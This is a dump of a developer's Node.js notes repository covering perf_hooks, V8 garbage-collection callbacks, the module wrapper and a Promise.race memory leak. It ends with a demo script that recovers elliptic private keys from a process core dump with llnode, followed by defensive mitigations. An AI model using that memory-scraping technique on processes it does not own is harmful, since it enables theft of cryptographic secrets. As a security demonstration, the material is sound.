{"name":"Http2Session","entryType":"http2","startTime":55.001057,"duration":9.796909,"type":"server","pingRTT":0,"framesReceived":4,"framesSent":7,"streamCount":1,"streamAverageDuration":3.810295,"bytesWritten":106,"bytesRead":100,"maxConcurrentStreams":1} 95 | ``` 96 | 97 | Full code available in [examples/http2.js](./examples/http2.js) 98 | 99 | #### gc 100 | 101 | Probably most hard entry type for understanding is `gc`. Under hard I mean understanding what field [kind](https://nodejs.org/docs/v12.10.0/api/perf_hooks.html#perf_hooks_performanceentry_kind) means. 102 | 103 | Constants `NODE_PERFORMANCE_GC_*` exported from V8: [src/node_perf.h#L104-L109](https://github.com/nodejs/node/blob/v12.10.0/src/node_perf.h#L104-L109). Currently with values: 104 | 105 | - `NODE_PERFORMANCE_GC_MAJOR` = `GCType::kGCTypeMarkSweepCompact` = 2 106 | - `NODE_PERFORMANCE_GC_MINOR` = `GCType::kGCTypeScavenge` = 1 107 | - `NODE_PERFORMANCE_GC_INCREMENTAL` = `GCType::kGCTypeIncrementalMarking` = 4 108 | - `NODE_PERFORMANCE_GC_WEAKCB` = `GCType::kGCTypeProcessWeakCallbacks` = 8 109 | 110 | From names it's obvious that `MAJOR` is gc call for old generation, `MINOR` gc call for young generation. Garbage Collector uses marking for checking which objects alive, but run marking on big heap is like stop the world for few hundred milliseconds, because this `INCREMENTAL` marking was implemented which is set of few small marking calls (see details in [A tour of V8: Garbage Collection](http://jayconrod.com/posts/55/a-tour-of-v8-garbage-collection) — `Incremental marking and lazy sweeping`). Finally, last `gc` kind now is `WEAKCB`: when we make Object derived from `PersistentBase` in addons weak with `SetWeak` call, we can pass callback which will be called when Object will be Garbage Collected. Thing is, that no other v8 api can be called in this callback, so we can set another (second) callback which will be called later — this will produce `WEAKCB`. [SetSecondPassCallback](https://github.com/nodejs/node/blob/v12.10.0/deps/v8/include/v8.h#L421-L427) in `v8.h`. 111 | 112 | ```js 113 | MyStructCallback1 114 | {"name":"gc","entryType":"gc","startTime":54.537262,"duration":0.237857,"kind":1} 115 | {"name":"gc","entryType":"gc","startTime":55.275977,"duration":0.021478,"kind":4} 116 | MyStructCallback2 117 | {"name":"gc","entryType":"gc","startTime":57.155068,"duration":0.383058,"kind":2} 118 | {"name":"gc","entryType":"gc","startTime":63.663558,"duration":0.061706,"kind":4} 119 | {"name":"gc","entryType":"gc","startTime":66.752791,"duration":0.655389,"kind":2} 120 | {"name":"gc","entryType":"gc","startTime":67.479331,"duration":0.000318,"kind":8} 121 | ``` 122 | 123 | Full code available in [examples/gc.js](./examples/gc.js) 124 | 125 | This example also require building addon, because without it we can not receive `NODE_PERFORMANCE_GC_WEAKCB` gc kind. We also need run script with flags `--expose-gc` & `--stress-incremental-marking` because need `global.gc` for Scavenge and need force `NODE_PERFORMANCE_GC_INCREMENTAL` without big heap size. Order of GC calls can be different for you, but you should see each kind. 126 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/binding.gyp: -------------------------------------------------------------------------------- 1 | { 2 | "targets": [ 3 | { 4 | "target_name": "gcweak", 5 | "cflags!": [ "-fno-exceptions" ], 6 | "cflags_cc!": [ "-fno-exceptions" ], 7 | "sources": [ "gcweak.cc" ], 8 | 'defines': [ 'NAPI_DISABLE_CPP_EXCEPTIONS' ], 9 | } 10 | ] 11 | } 12 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/function.js: -------------------------------------------------------------------------------- 1 | const { performance, PerformanceObserver } = require('perf_hooks') 2 | 3 | const obs = new PerformanceObserver((items) => { 4 | const entry = items.getEntries()[0] 5 | console.log(JSON.stringify(entry)) 6 | obs.disconnect() 7 | }) 8 | obs.observe({ entryTypes: ['function'] }) 9 | 10 | function doSomeWork () { 11 | for (let i = 0; i < 1e8; ++i); 12 | } 13 | 14 | performance.timerify(doSomeWork)() 15 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/gc.js: -------------------------------------------------------------------------------- 1 | const { PerformanceObserver, constants } = require('perf_hooks') 2 | 3 | const obs = new PerformanceObserver((items) => { 4 | const entry = items.getEntries()[0] 5 | console.log(JSON.stringify(entry)) 6 | }) 7 | obs.observe({ entryTypes: ['gc'] }) 8 | 9 | const gcweak = require('bindings')('gcweak') 10 | gcweak.fn1.call({}) 11 | 12 | global.gc(true) 13 | 14 | setTimeout(() => {}, 50) 15 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/gcweak.cc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | struct MyStruct { 4 | v8::Global wrapper; 5 | }; 6 | 7 | // v8.h line 427 8 | void MyStructCallback2(const v8::WeakCallbackInfo& data) { 9 | printf("MyStructCallback2\n"); 10 | } 11 | 12 | void MyStructCallback1(const v8::WeakCallbackInfo& data) { 13 | printf("MyStructCallback1\n"); 14 | data.GetParameter()->wrapper.Reset(); 15 | delete data.GetParameter(); 16 | data.SetSecondPassCallback(MyStructCallback2); 17 | } 18 | 19 | void Method(const v8::FunctionCallbackInfo& args) { 20 | v8::Isolate* isolate = args.GetIsolate(); 21 | v8::Local context = isolate->GetCurrentContext(); 22 | 23 | MyStruct* ptr = new MyStruct(); 24 | ptr->wrapper.Reset(isolate, args.This()); 25 | ptr->wrapper.SetWeak(ptr, MyStructCallback1, v8::WeakCallbackType::kParameter); 26 | v8::Local external = v8::External::New(isolate, ptr); 27 | 28 | v8::Local obj = v8::Object::New(isolate); 29 | v8::Local key = v8::String::NewFromUtf8(isolate, "obj", v8::NewStringType::kNormal).ToLocalChecked(); 30 | obj->Set(context, key, external).FromJust(); 31 | args.GetReturnValue().Set(obj); 32 | } 33 | 34 | void Initialize(v8::Local exports, v8::Local module, void* context) { 35 | NODE_SET_METHOD(exports, "fn1", Method); 36 | } 37 | 38 | NODE_MODULE(NODE_GYP_MODULE_NAME, Initialize) 39 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/http.js: -------------------------------------------------------------------------------- 1 | const http = require('http') 2 | const { PerformanceObserver } = require('perf_hooks') 3 | 4 | const obs = new PerformanceObserver((items) => { 5 | const entry = items.getEntries()[0] 6 | console.log(JSON.stringify(entry)) 7 | }) 8 | obs.observe({ entryTypes: ['http'] }) 9 | 10 | const server = http.createServer((req, res) => res.end('ok')).listen(8000) 11 | server.once('listening', () => { 12 | http.request('http://localhost:8000/') 13 | .on('data', () => {}) 14 | .once('close', () => server.close()) 15 | .end() 16 | }) 17 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/http2.js: -------------------------------------------------------------------------------- 1 | const http2 = require('http2') 2 | const { PerformanceObserver } = require('perf_hooks') 3 | 4 | const obs = new PerformanceObserver((items) => { 5 | const entry = items.getEntries()[0] 6 | console.log(JSON.stringify(entry)) 7 | }) 8 | obs.observe({ entryTypes: ['http2'] }) 9 | 10 | const server = http2.createServer({}, (req, res) => res.end('ok')).listen(8000) 11 | server.once('listening', () => { 12 | const client = http2.connect('http://localhost:8000') 13 | client 14 | .request() 15 | .on('data', () => {}) 16 | .once('close', () => client.close()) 17 | .once('close', () => server.close()) 18 | .end() 19 | }) 20 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/mark-measure.js: -------------------------------------------------------------------------------- 1 | const { performance, PerformanceObserver } = require('perf_hooks') 2 | 3 | const obs = new PerformanceObserver((items) => { 4 | const entry = items.getEntries()[0] 5 | console.log(JSON.stringify(entry)) 6 | 7 | if (entry.entryType === 'measure') { 8 | obs.disconnect() 9 | performance.clearMarks('A') 10 | performance.clearMarks('B') 11 | } 12 | }) 13 | obs.observe({ entryTypes: ['mark', 'measure'] }) 14 | 15 | function doSomeWork () { 16 | for (let i = 0; i < 1e8; ++i); 17 | } 18 | 19 | ;(async () => { 20 | performance.mark('A') 21 | doSomeWork() 22 | performance.mark('B') 23 | performance.measure('A to B', 'A', 'B') 24 | })().catch((err) => { 25 | console.error(err.stack || err) 26 | process.exit(1) 27 | }) 28 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/node.js: -------------------------------------------------------------------------------- 1 | const { performance } = require('perf_hooks') 2 | 3 | process.on('exit', () => console.log(performance.nodeTiming)) 4 | process.nextTick(() => {}) 5 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "perf_hooks-examples", 3 | "version": "0.0.1", 4 | "dependencies": { 5 | "bindings": "^1.5.0", 6 | "node-gyp": "^5.0.3" 7 | }, 8 | "private": true, 9 | "gypfile": true 10 | } 11 | -------------------------------------------------------------------------------- /2019-09-21-node-object-gc-callback/README.md: -------------------------------------------------------------------------------- 1 | # Node.js: callback when object Garbage Collected 2 | 3 | In JavaScript we do not control objects lifetime, instead Garbage Collector remove not used objects for us. JavaScript engine count references to objects, once number of references equal to zero, object marked for removal. If you not familiar with memory management in JS, you can check [Memory Management on mdn](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Memory_Management) for beginning. One important note here that once object marked for removal it does not means that memory will be released immediately. This only happen when Garbage Collection happened and engine will require memory for allocating new objects (or reduce memory footprint). 4 | 5 | But even with removing objects by Garbage Collector we still can be notified about this, unfortunately this only available in [Node.js](https://nodejs.org/) with [C++ addons](https://nodejs.org/api/addons.html). 6 | 7 | ### MakeWeak and SetWeak 8 | 9 | First concept of such way was developed by [Ben Noordhuis](https://github.com/bnoordhuis) as solution for [Node.js issue 631](https://github.com/joyent/node/issues/631) -- https://github.com/bnoordhuis/node-weakref 10 | 11 | Solution was create persistent object which have reference to original object and call method [MakeWeak](https://v8docs.nodesource.com/node-0.10/d2/d78/classv8_1_1_persistent.html#a5610d667bc793ba0af838bb134941bec) ([code in node-weakref](https://github.com/bnoordhuis/node-weakref/blob/18b6eca1408ff8c86a1d772aba2df0870ea5d27a/src/weakref.cc#L138-L146)). `MakeWeak` require callback as second argument, which will be called when only _weak_ object will have reference to original object during gc work. Now `MakeWeak` is private API method, so we can not use such way. 12 | 13 | Ben provided concept, but [Nathan Rajlich (TooTallNate)](https://github.com/TooTallNate) start maintain it in [node-weak](https://github.com/TooTallNate/node-weak). Idea was same, except that now instead [SetWeak](https://v8docs.nodesource.com/node-12.0/d4/dca/classv8_1_1_persistent_base.html#a9a1e1d92935d6fac29091cff63592854) used instead `MakeWeak` (see call [in code](https://github.com/TooTallNate/node-weak/blob/f222cf78a7d9522cafc60a4f15cf48ebaf7ed3a0/src/weakref.cc#L187)). `SetWeak` have awesome NOTE: 14 | 15 | > There is no guarantee as to when or even if the callback is invoked. The invocation is performed solely on a best effort basis. As always, GC-based finalization should not be relied upon for any critical form of resource management! 16 | 17 | For example if your application which uses [V8](https://v8.dev/) (usually Node.js) not manually remove objects after event loop stop, then callback passed to `SetWeak` will be never called. 18 | 19 | Also `SetWeak` may potentially make your application crash because call callback JS code in callback, while right approach will call [SetSecondPassCallback](https://v8docs.nodesource.com/node-12.0/d8/d06/classv8_1_1_weak_callback_info.html#a63750d6bc85beb6a093deb7ca0c4c1bf) as [v8 documentation recommend](https://v8docs.nodesource.com/node-12.0/d4/da0/v8_8h_source.html#l00420). 20 | 21 | ### WeakMap 22 | 23 | While `SetWeak` is still working solution, new approach from [Anna Henningsen](https://github.com/addaleax) implemented in [weak-napi](https://github.com/node-ffi-napi/weak-napi) looks much better. 24 | 25 | First, new approach use [N-API](https://nodejs.org/api/n-api.html) which not require rebuild bindings each time when v8 version in node changed. Second, instead `SetWeak` native `WeakMap` used, what means 1) callback will be called in a suitable time (no potentially crashed applications) 2) native primitives are used. 26 | 27 | So, how it's possible to track object that garbage collected with native `WeakMap`? 28 | 29 | First, in C++ bindings persistent function and [ObjectReference](https://github.com/nodejs/node-addon-api/blob/master/doc/object_reference.md) store dead callback and original object. Resulted objected passed to [Proxy](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Proxy), as result we still can access to original object, but not store any references to it. With newly created object module create simple object in C++ which will call [`OnFree`](https://github.com/node-ffi-napi/weak-napi/blob/v1.0.3/src/weakref.cc#L53) on destructing. `OnFree` itself will call passed callback which means that original object was garbage collected. This new last object will be stored as value in global `WeakMap` where key will be original object. 30 | 31 | All this works because once original object garbage collected then value can be removed. Once value removed, destructor of C++ object called and call `OnFree` in its turn. `OnFree` call dead callback and now we in JS know that our object was garbage collected. That's really great idea use all this stuff together. 32 | 33 | As example such script can be tested: 34 | 35 | ```js 36 | // node --expose-gc index.js 37 | const weak = require('weak-napi') 38 | 39 | const obj = {} 40 | const ref = weak(obj, () => { 41 | console.log('"obj" has been garbage collected!') 42 | }) 43 | 44 | setTimeout(() => { 45 | global.gc() 46 | }, 100) 47 | ``` 48 | 49 | and result: 50 | ```bash 51 | "obj" has been garbage collected! 52 | ``` 53 | -------------------------------------------------------------------------------- /2019-09-23-node-module-wrapper/README.md: -------------------------------------------------------------------------------- 1 | # Module wrapper in Node.js 2 | 3 | All this years which I code on JavaScript I had never though what is `require` / `module` / `__filename` / `__dirname` in [Node.js](https://nodejs.org/). They just work. I know that I can export things with `export` Object or redefine it with `module.exports`, knew that `__filename` is path to current file and `__dirname` is directory of `__filename`. In additional to `require` I used function `resolve` sometimes. That's all. Now looking in past I think it's a shame, but we can not know everything and learning all the time. In this short note I'd like to share my new knowledge. 4 | 5 | First we can start from [Node.js Documentation](https://nodejs.org/api/documentation.html), while we can use it all the time for checking how different functions works, some topics can be ignored because not required right now for our tasks. Modules can be one of such topics, but they actually described in docs: https://nodejs.org/api/modules.html 6 | 7 | Why modules? Because each file in Node.js is threated as separate module. Modules documentation have interesting section [The module wrapper](https://nodejs.org/api/modules.html#modules_the_module_wrapper), from where we can learn that code in files wrapped to function wrapper: 8 | 9 | ```js 10 | (function(exports, require, module, __filename, __dirname) { 11 | // Module code actually lives in here 12 | }); 13 | ``` 14 | 15 | Now it's clear why global variables defined in files not available from other files. Wrapping in Node.js code defined in [cjs/loader.js#L859-L868](https://github.com/nodejs/node/blob/v12.10.0/lib/internal/modules/cjs/loader.js#L859-L868). Wrapped code compiled with [vm](https://nodejs.org/api/vm.html) module, but this happened only if some `patched` variable set to `true`. Otherwise `CompileFunctionInContext` from V8 used. 16 | 17 | Not only `wrap` exported through `module.wrap`, but also lines for wrapping function as variable `wrapper`. This better explain in code: [cjs/loader.js#L180-L200](https://github.com/nodejs/node/blob/v12.10.0/lib/internal/modules/cjs/loader.js#L180-L200) You also can find here that `patched` changed to `true` once we change `wrap` or `wrapper`. 18 | 19 | We can change both `wrap` and `wrapper`, for example we can measure how much time required for execute code in file: 20 | 21 | ```js 22 | const mod = require('module') 23 | mod.wrapper[0] = mod.wrapper[0] + 'require("perf_hooks").performance.mark(__filename + "_start");' 24 | mod.wrapper[1] = 'require("perf_hooks").performance.mark(__filename + "_end");require("perf_hooks").performance.measure(__filename, __filename + "_start", __filename + "_end");' + mod.wrapper[1] 25 | 26 | const { performance, PerformanceObserver } = require('perf_hooks') 27 | const observer = new PerformanceObserver((items) => { 28 | const entry = items.getEntries()[0] 29 | console.log(`${entry.entryType} => ${entry.duration}`) 30 | }); 31 | observer.observe({ entryTypes: ['measure', 'function'] }) 32 | 33 | performance.timerify(require)('./some-file') 34 | ``` 35 | 36 | where `some-file.js` can be: 37 | 38 | ```js 39 | const http = require('http') 40 | ``` 41 | 42 | result on my machine: 43 | 44 | ```bash 45 | measure => 3.841967 46 | function => 8.28471 47 | ``` 48 | 49 | `measure` means how much time was need for execute code in file, while `function` means total time spent by `require`. 50 | 51 | Another example can be modify `wrapper` in such way, that all code will be executed in strict mode: [isaacs/use-strict](https://github.com/isaacs/use-strict) 52 | -------------------------------------------------------------------------------- /2019-09-27-node-promise-leaking/README.md: -------------------------------------------------------------------------------- 1 | # Why you should not left promises in pending state in Node.js 2 | 3 | I think in 2019 nobody need explanation what is [Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise), how they should be used, why they was introduced and bla-bla-bla. 4 | 5 | I never knew how Promises implemented in V8 and was tried implement something like [Go context](https://golang.org/pkg/context/) in [Node.js](https://nodejs.org/), but this was not successful. In the end I found memory leak in my application and decide to learn how Promises works in V8, so I start read source code. 6 | 7 | ### Simple loop and memory leak 8 | 9 | In my server-side application on which I worked \~1.5 years I used idea of *active* promise which not resolved while applicaiton working and resolved when `SIGINT` or `SIGTERM` received. As result all loops or processes dependent from this *promise* will be finished and application will be gracefully shutdown. For this I used [Promise.race](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise/race) and loop function was looks like: 10 | 11 | ```js 12 | function diffTime (time) { 13 | if (time === undefined) return process.hrtime() 14 | 15 | const diff = process.hrtime(time) 16 | return diff[0] * 1e3 + diff[1] / 1e6 17 | } 18 | 19 | function delay (ms) { 20 | return new Promise((resolve) => setTimeout(resolve, ms) 21 | } 22 | 23 | async function startLoop (fn, activePromise, intervalMax, failsBeforeMax) { 24 | const interval = Math.ceil(intervalMax / Math.pow(2, failsBeforeMax)) 25 | const sym = Symbol('active deferred') 26 | 27 | for (let loopInterval = interval; ;) { 28 | const ts = diffTime() 29 | 30 | try { 31 | const redefined = await Promise.race([activePromise.then(() => sym), fn()]) 32 | switch (result) { 33 | case sym: return 34 | case undefined: loopInterval = interval; break 35 | case null: return 36 | default: loopInterval = redefined 37 | } 38 | } catch (err) { 39 | loopInterval = Math.min(loopInterval * 2, intervalMax) 40 | } 41 | 42 | const sleepTime = loopInterval - diffTime(ts) 43 | if (sleepTime > 0) await Promise.race([activePromise, delay(sleepTime)]) 44 | } 45 | } 46 | ``` 47 | 48 | As you can see from `startLoop` function `activePromise` can be used twice in two different `Promise.race` per one iteration. In first *race* we call `activePromise.then()`, i.e. create new `Promise` from `activePromise` which will be resolved with `sym`. On each iteration. 49 | 50 | Service worked with this loop a lot of time, but when I tried to implement context package for public usage I go carefully through code and realized that each time I add resolve function to `Promise` which never will be resolved, what this mean? That means that our objects growing endlessly. That means that application can use less and less memory with each iteration for other objects and in the end can fail with `out of memory`. 51 | 52 | ### We need to go deeper 53 | 54 | Then I though how *Promise* work in V8? Is `Promise.race` safe to use? Maybe there some hacks which I can use? 55 | 56 | First I was need to find where `Promise` is built in V8, this is done in [src/init/bootstrapper.cc#L2298](https://github.com/nodejs/node/blob/v12.11.0/deps/v8/src/init/bootstrapper.cc#L2298). Here is `Promise.race` lines: 57 | 58 | ```cpp 59 | InstallFunctionWithBuiltinId(isolate_, promise_fun, "race", 60 | Builtins::kPromiseRace, 1, true); 61 | ``` 62 | 63 | As we see *Builtins* used, what is this? *Builtins* is a code chunks which executable by the VM at runtime. Thanks to V8 devs they have good article about it: [CodeStubAssembler builtins](https://v8.dev/docs/csa-builtins). 64 | 65 | Promise related builtins defined in separate file [src/builtins/builtins-promise-gen.cc](https://github.com/nodejs/node/blob/v12.11.0/deps/v8/src/builtins/builtins-promise-gen.cc), `race` on lines [#L2575-L2706](https://github.com/nodejs/node/blob/v12.11.0/deps/v8/src/builtins/builtins-promise-gen.cc#L2575-L2706). 66 | 67 | There a lot of code and if you look on CSA at first time this probably will be not clear. But all this code respect spec [Promise.race in ECMA-262](https://tc39.es/ecma262/#sec-promise.race). 68 | 69 | Shorly this will be: `Promise.race` create new `Promise` and receive `resolve` and `reject` functions. Then go through iterable object which was passed, pass value of iteration to `Promise.resolve` and then call `.then` to where pass `resolve` and `reject`. Or rough pseudocode of this will looks like: 70 | 71 | ```js 72 | function promiseRace (promises) { 73 | return new Promise((resolve, reject) => { 74 | for (const promise of promises) { 75 | Promise.resolve(promise).then(resolve, reject) 76 | } 77 | }) 78 | } 79 | ``` 80 | 81 | Do you see problem? We call `then` for each promise. On each `Promise.race` V8 call `then`. So if yours promise will not be *resolved* or *rejected* or can not be collected by GC, you receive memory leak with native `Promise.race`. Sounds crazy, but it's reality. 82 | 83 | As example of this problem you can run next code: 84 | 85 | ```js 86 | let resolveUnresolved 87 | const unresolved = new Promise((r) => { resolveUnresolved = r }) 88 | const resolved = Promise.resolve(42) 89 | 90 | setInterval(() => { 91 | for (let i = 0; i < 1e5; ++i) { 92 | Promise.race([unresolved, resolved]) 93 | } 94 | 95 | // const { heapUsed } = process.memoryUsage() 96 | // if (heapUsed > 500 * 1024 * 1024) resolveUnresolved() 97 | }, 100) 98 | ``` 99 | 100 | Better run it with `--trace-gc`, with tracing you will see how often GC called and how heap size changed after GC. In the end you will receive `out of memory`. 101 | 102 | If you uncomment two lines which will cause promise resolving then nearest `Mark-sweep` GC call will decrease heap size to normal value and application will never fail. 103 | 104 | ### Epilog 105 | 106 | While promises made our code easier for writing and understanding other kind of problems was introduced (which in such case depends from implementation!). Be sure that you always resolved your promises or they garbage collected. 107 | 108 | And read soure code! Where else you can find that `Promise.all` have limit [2\*\*21-1](https://github.com/nodejs/node/blob/v12.11.0/deps/v8/src/builtins/builtins-promise-gen.cc#L2201-L2207) elements for example? 109 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/README.md: -------------------------------------------------------------------------------- 1 | # JavaScript, sometimes, is not your friend 2 | 3 | Everybody know that JavaScript have Garbage Collector. From one side this is a great feature, which allow us write code faster, from other side we can not control memory manually. This can have some unpleasant consequences, for example with cryptography operations. How many people thought about what happens with objects where they kept sensitive data? 4 | 5 | ### elliptic and llnode 6 | 7 | [indutny/elliptic](https://github.com/indutny/elliptic) is great library, really. Used in a lot of applications and by [npmjs](https://www.npmjs.com/package/elliptic) stats have more than 7M downloads per week! 8 | 9 | So it will be good to show, how some private keys can be restored. For this we will use [nodejs/llnode](https://github.com/nodejs/llnode) what is C++ plugin for LLDB debugger. `llnode` currently node work on node@12, so you need use 10 or lower. 10 | 11 | For demo I create small HTTP server ([server.js](server.js)), which on request: 12 | 13 | - [Random KeyPair generated](https://github.com/indutny/elliptic/blob/v6.5.2/lib/elliptic/ec/index.js#L54) 14 | - Private and Public keys printed to stdout 15 | - Public key sent to client 16 | - Call `setTimeoutglobal.gc, 100)` for collecting not used objects 17 | 18 | By code, it's looks like that KeyPair should be collected by GC and nothing should be left in Node.js heap. But let's check! 19 | 20 | You can run server with command (of course you need install dependencies first: `yarn install`): 21 | 22 | ```bash 23 | $ node --expose-gc server.js 24 | ``` 25 | 26 | and now you can make few requests to `localhost:8000`: 27 | 28 | ```bash 29 | $ for (( a = 1; a < 10; a++ )); do curl localhost:8000; done 30 | ``` 31 | 32 | As result you will see something like this in stdout by `server.js`: 33 | 34 | ```bash 35 | Server at localhost:8000 (pid: 10321) 36 | b5d9d042530476b0d732e75cab8a209d544a3fad4a5d9dd3d8e321232eb2c065 => 038274d363bc754ddd7ed21b295945363e01e4d85e8de983addc6818073d6935c4 37 | 5dc10a253e6de5abaad396aa460f6a27f4af6400602c7e59978fb5a02a6d2ffc => 025f6cb9747ada6fc7c81c2baa68e47f088a9161bca806773b0dba3bcdc1259803 38 | ... 39 | d924065526f565c7902737459adb621cbfd6f113849b9a85056c9e80d81e5ac4 => 0310baa0d3c4375e8407941812f6ed88b029867ea76b33dfea0d25a58fb5727c98 40 | ``` 41 | 42 | and only public keys in terminal where cURL was called: 43 | 44 | ```bash 45 | 038274d363bc754ddd7ed21b295945363e01e4d85e8de983addc6818073d6935c4 46 | 025f6cb9747ada6fc7c81c2baa68e47f088a9161bca806773b0dba3bcdc1259803 47 | ... 48 | 0310baa0d3c4375e8407941812f6ed88b029867ea76b33dfea0d25a58fb5727c98 49 | ``` 50 | 51 | Now, we need generate core file by [gcore](http://man7.org/linux/man-pages/man1/gcore.1.html): 52 | 53 | ```bash 54 | $ gcore 10321 55 | [New LWP 10322] 56 | [New LWP 10323] 57 | [New LWP 10324] 58 | [New LWP 10325] 59 | [New LWP 10326] 60 | [New LWP 10327] 61 | [Thread debugging using libthread_db enabled] 62 | Using host libthread_db library "/lib64/libthread_db.so.1". 63 | 0x00007f995ca692c6 in epoll_pwait () from /lib64/libc.so.6 64 | warning: target file /proc/10321/cmdline contained unexpected null characters 65 | Saved corefile core.10321 66 | [Inferior 1 (process 10321) detached] 67 | ``` 68 | 69 | Great, now we can try find private keys by public keys. It's very simple, everything what you need is run [llnode.js](llnode.js) script: 70 | 71 | ```bash 72 | $ node llnode.js core.10321 038274d363bc754ddd7ed21b295945363e01e4d85e8de983addc6818073d6935c4 73 | Found 0 KeyPair instances. 74 | Found 970 BN instances. 75 | $ node llnode.js core.10321 0310baa0d3c4375e8407941812f6ed88b029867ea76b33dfea0d25a58fb5727c98 76 | Found 0 KeyPair instances. 77 | Found 970 BN instances. 78 | Found private key for given public key! 79 | d924065526f565c7902737459adb621cbfd6f113849b9a85056c9e80d81e5ac4 => 0310baa0d3c4375e8407941812f6ed88b029867ea76b33dfea0d25a58fb5727c98 80 | ``` 81 | 82 | Yes, GC removed all keys except last, but we forced this call. Do we always call call `global.gc()` when we do not need sensitive data anymore? 83 | 84 | Sometimes, lack of access to memory management is bad. 85 | 86 | ### How things can be solved? 87 | 88 | In Node.js most likely is no way to solve it. Probably, if you move data processing to [addon](https://nodejs.org/api/addons.html) it will help. 89 | 90 | If you need only Buffer, good way use Memory Protection from [sodium-friends/sodium-native](https://github.com/sodium-friends/sodium-native#memory-protection). Which is addon to libsodium. 91 | 92 | [jedisct1/libsodium](https://github.com/jedisct1/libsodium) have [Secure memory](https://download.libsodium.org/doc/memory_management) which result of: 93 | 94 | - [madvise](http://man7.org/linux/man-pages/man2/madvise.2.html) with `MADV_DONTDUMP` which exclude memory segment from core file 95 | - [mlock](http://man7.org/linux/man-pages/man2/mlock.2.html) which disable swapping memory segment 96 | - [mprotect](http://man7.org/linux/man-pages/man2/mprotect.2.html) as guard pages 97 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/llnode.js: -------------------------------------------------------------------------------- 1 | const EC = require('elliptic').ec 2 | const BN = require('bn.js') 3 | // const llnode = require('llnode') 4 | const { fromCoredump } = require('../../llnode') 5 | 6 | const secp256k1 = new EC('secp256k1') 7 | const knownPubKey = process.argv[3] 8 | 9 | // zero item path to node 10 | // second item path to coredump 11 | const llnode = fromCoredump(process.argv[2], process.argv[0]) 12 | const types = llnode.getHeapTypes() 13 | 14 | const keyPairHeapType = types.filter(({ typeName }) => typeName === 'KeyPair')[0] 15 | console.log(`Found ${keyPairHeapType ? keyPairHeapType.instanceCount : 0} KeyPair instances.`) 16 | 17 | const bnHeapType = types.filter(({ typeName }) => typeName === 'BN')[0] 18 | console.log(`Found ${bnHeapType ? bnHeapType.instanceCount : 0} BN instances.`) 19 | 20 | if (!bnHeapType) { 21 | console.log(`No BN instances, exit`) 22 | process.exit(1) 23 | } 24 | 25 | for (const { value } of bnHeapType.instances[Symbol.iterator]()) { 26 | if (value.endsWith('')) continue 27 | 28 | const negative = parseInt(value.match(/negative=/)[1], 10) 29 | const wordsAddr = value.match(/words=(0x.[0-9a-f]+):/)[1] 30 | const length = parseInt(value.match(/length=`).exec(words)[1], 10) 41 | } 42 | 43 | if (bn.cmp(secp256k1.curve.n) >= 0 || bn.isZero()) continue 44 | 45 | const kp = secp256k1.keyFromPrivate(bn) 46 | const pubkey = kp.getPublic(true, 'hex') 47 | if (pubkey === knownPubKey) { 48 | console.log(`Found private key for given public key!`) 49 | console.log(`${kp.getPrivate('hex')} => ${kp.getPublic(true, 'hex')}`) 50 | break 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "elliptic": "^6.5.2", 4 | "llnode": "^2.2.0" 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/server.js: -------------------------------------------------------------------------------- 1 | const http = require('http') 2 | const EC = require('elliptic').ec 3 | 4 | const secp256k1 = new EC('secp256k1') 5 | 6 | const server = http.createServer((req, res) => { 7 | const keypair = secp256k1.genKeyPair() 8 | const seckey = keypair.getPrivate('hex') 9 | const pubkey = keypair.getPublic(true, 'hex') 10 | console.log(`${seckey} => ${pubkey}`) 11 | 12 | res.end(pubkey + '\n') 13 | 14 | if (global.gc) setTimeout(global.gc, 100) 15 | }) 16 | 17 | server.on('error', (err) => { 18 | console.error(err.stack || err) 19 | process.exit(1) 20 | }) 21 | 22 | const port = 8000 23 | server.listen(port, (err) => console.log(`Server at localhost:${port} (pid: ${process.pid})`)) 24 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/yarn.lock: -------------------------------------------------------------------------------- 1 | # THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. 2 | # yarn lockfile v1 3 | 4 | 5 | bindings@^1.3.0: 6 | version "1.5.0" 7 | resolved "https://registry.yarnpkg.com/bindings/-/bindings-1.5.0.tgz#10353c9e945334bc0511a6d90b38fbc7c9c504df" 8 | integrity sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ== 9 | dependencies: 10 | file-uri-to-path "1.0.0" 11 | 12 | bn.js@^4.4.0: 13 | version "4.11.8" 14 | resolved "https://registry.yarnpkg.com/bn.js/-/bn.js-4.11.8.tgz#2cde09eb5ee341f484746bb0309b3253b1b1442f" 15 | integrity sha512-ItfYfPLkWHUjckQCk8xC+LwxgK8NYcXywGigJgSwOP8Y2iyWT4f2vsZnoOXTTbo+o5yXmIUJ4gn5538SO5S3gA== 16 | 17 | brorand@^1.0.1: 18 | version "1.1.0" 19 | resolved "https://registry.yarnpkg.com/brorand/-/brorand-1.1.0.tgz#12c25efe40a45e3c323eb8675a0a0ce57b22371f" 20 | integrity sha1-EsJe/kCkXjwyPrhnWgoM5XsiNx8= 21 | 22 | elliptic@^6.5.2: 23 | version "6.5.2" 24 | resolved 